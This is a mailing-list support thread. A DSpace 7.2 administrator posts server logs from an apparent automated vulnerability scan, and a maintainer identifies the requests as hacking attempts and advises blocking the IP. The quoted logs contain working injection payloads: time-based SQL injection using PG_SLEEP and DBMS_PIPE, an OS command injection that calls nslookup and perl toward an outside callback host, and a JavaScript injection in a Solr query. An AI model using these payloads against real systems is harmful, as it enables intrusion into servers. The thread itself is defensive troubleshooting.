Support
102 views
Skip to first unread message
Nicolas Battaglia
Oct 12, 2022, 4:31:34 PM10/12/22
to DSpace Technical Support
Hello everybody
I've a problem with my dspace 7.2 PROD server
Today the angular client stopped working, after restarting it it works for a few minutes and stops.
In the nodejs console I found messages similar to these
In the nodejs console I found messages similar to these
GET /communities/6a318891-0c45--1%20OR%202+555-555-1=0+0+0+1-b3b6-4caa1be4af44 404 995.928 ms - -
GET /communities/de19a2f4-1be2-8MBJaJkQ'))%20OR%20510=(SELECT%20510%20FROM%20PG_SLEEP(15))--c80-a57a-3814a958fb8e 404 1129.742 ms - -
GET /communities/de19a2f4-1be2-8MBJaJkQ'))%20OR%20510=(SELECT%20510%20FROM%20PG_SLEEP(15))--c80-a57a-3814a958fb8e 404 1129.742 ms - -
GET /communities/2'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98),15)%7C%7C'a8a3d54-61f6-4663-a293-d7fe02058c76 200 800.296 ms - -
Environment: Production
GET /communities/6a318891-0c45-1*4277-b3b6-4caa1be4af44 404 779.049 ms - -
Environment: Production
Environment: Production
GET /communities/f824abaf-%7C(nslookup%20hitlerkvauufubbfc3.bxss.me%7C%7Cperl%20-e%20%22gethostbyname('hitlerkvauufubbfc3.bxss.me')%22)a85-459f-a087-e521fd3f486f 200 1215.078 ms - -
Environment: Production
GET /communities/6a318891-0c45-1*4277-b3b6-4caa1be4af44 404 779.049 ms - -
Environment: Production
Environment: Production
GET /communities/f824abaf-%7C(nslookup%20hitlerkvauufubbfc3.bxss.me%7C%7Cperl%20-e%20%22gethostbyname('hitlerkvauufubbfc3.bxss.me')%22)a85-459f-a087-e521fd3f486f 200 1215.078 ms - -
and, in my dspace.log file, some messages like this:
022-10-12 03:51:55,017 ERROR unknown 70ae76ad-f77a-44f3-8932-58586342dc12 org.dspace.app.rest.utils.DiscoverQueryBuilder @ anonymous::Error in Discovery while setting up date facet range:date facet\colon; org.dspace.discovery.configuration.DiscoverySearchFilterFacet@20f3548b
org.dspace.discovery.SearchServiceException: Error from server at http://localhost:8983/solr/search: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[2020 TO "+(function(){if(typeof xwuYUD==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<0);xwuYUD=1;}}())+"]': Encountered " <RANGE_GOOP> "undefined\"){var "" at line 1, column 62.
Was expecting one of:
"]" ...
"}" ...
at org.dspace.discovery.SolrServiceImpl.search(SolrServiceImpl.java:726) ~[dspace-api-7.1.1.jar:7.1.1]
org.dspace.discovery.SearchServiceException: Error from server at http://localhost:8983/solr/search: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[2020 TO "+(function(){if(typeof xwuYUD==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<0);xwuYUD=1;}}())+"]': Encountered " <RANGE_GOOP> "undefined\"){var "" at line 1, column 62.
Was expecting one of:
"]" ...
"}" ...
at org.dspace.discovery.SolrServiceImpl.search(SolrServiceImpl.java:726) ~[dspace-api-7.1.1.jar:7.1.1]
Caused by: org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException: Error from server at http://localhost:8983/solr/search: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[2020 TO "+(function(){if(typeof xwuYUD==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<0);xwuYUD=1;}}())+"]': Encountered " <RANGE_GOOP> "undefined\"){var "" at line 1, column 62.
Was expecting one of:
"]" ...
"}" ...
Was expecting one of:
"]" ...
"}" ...
by the way, my today dspace log file is 200mb (others days is about 4mb)
any ideas?
thans
Tim Donohue
Oct 13, 2022, 12:20:08 PM10/13/22
to Nicolas Battaglia, DSpace Technical Support
Hi Nicolas,
Those logs make it look like someone is attempting to hack into your system or find a vulnerability by generating random URLs.
Those "GET /communities/" paths you shared appear to have embedded SQL commands and embedded Javascript. So, they look to be trying to determine if there's a way to execute those commands against your system. DSpace itself will never access or use URLs of
those types.
My recommendation would be to see if you can block the IP address which is sending those commands. While none of those commands should do anything in DSpace 7, they are obviously up to no good & trying to find a way to hack your system.
Overall, I don't see any bugs here in DSpace's behavior based on anything you've shared.
Tim
From: dspac...@googlegroups.com <dspac...@googlegroups.com> on behalf of Nicolas Battaglia <ing.nicola...@gmail.com>
Sent: Wednesday, October 12, 2022 3:31 PM
To: DSpace Technical Support <dspac...@googlegroups.com>
Subject: [dspace-tech] Support
Sent: Wednesday, October 12, 2022 3:31 PM
To: DSpace Technical Support <dspac...@googlegroups.com>
Subject: [dspace-tech] Support
--
All messages to this mailing list should adhere to the Code of Conduct: https://www.lyrasis.org/about/Pages/Code-of-Conduct.aspx
---
You received this message because you are subscribed to the Google Groups "DSpace Technical Support" group.
To unsubscribe from this group and stop receiving emails from it, send an email to dspace-tech...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/dspace-tech/CAJVJSdBYT-DbZqWjh8Buq0z8T5GbNh2KO5q-d5jjEMqXqi4pjg%40mail.gmail.com.
All messages to this mailing list should adhere to the Code of Conduct: https://www.lyrasis.org/about/Pages/Code-of-Conduct.aspx
---
You received this message because you are subscribed to the Google Groups "DSpace Technical Support" group.
To unsubscribe from this group and stop receiving emails from it, send an email to dspace-tech...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/dspace-tech/CAJVJSdBYT-DbZqWjh8Buq0z8T5GbNh2KO5q-d5jjEMqXqi4pjg%40mail.gmail.com.
Nicolas Battaglia
Oct 13, 2022, 2:15:39 PM10/13/22
to Tim Donohue, DSpace Technical Support
hello tim, i solved the problem with an ip filter, my concern was that the angular client stopped working with something more than 10 requests per second. Analyzing the rest api log, I identified that each request started to take up to 10 seconds. Then, I restart the application service (nodejs) and it was working again for a few seconds
Reply all
Reply to author
Forward
0 new messages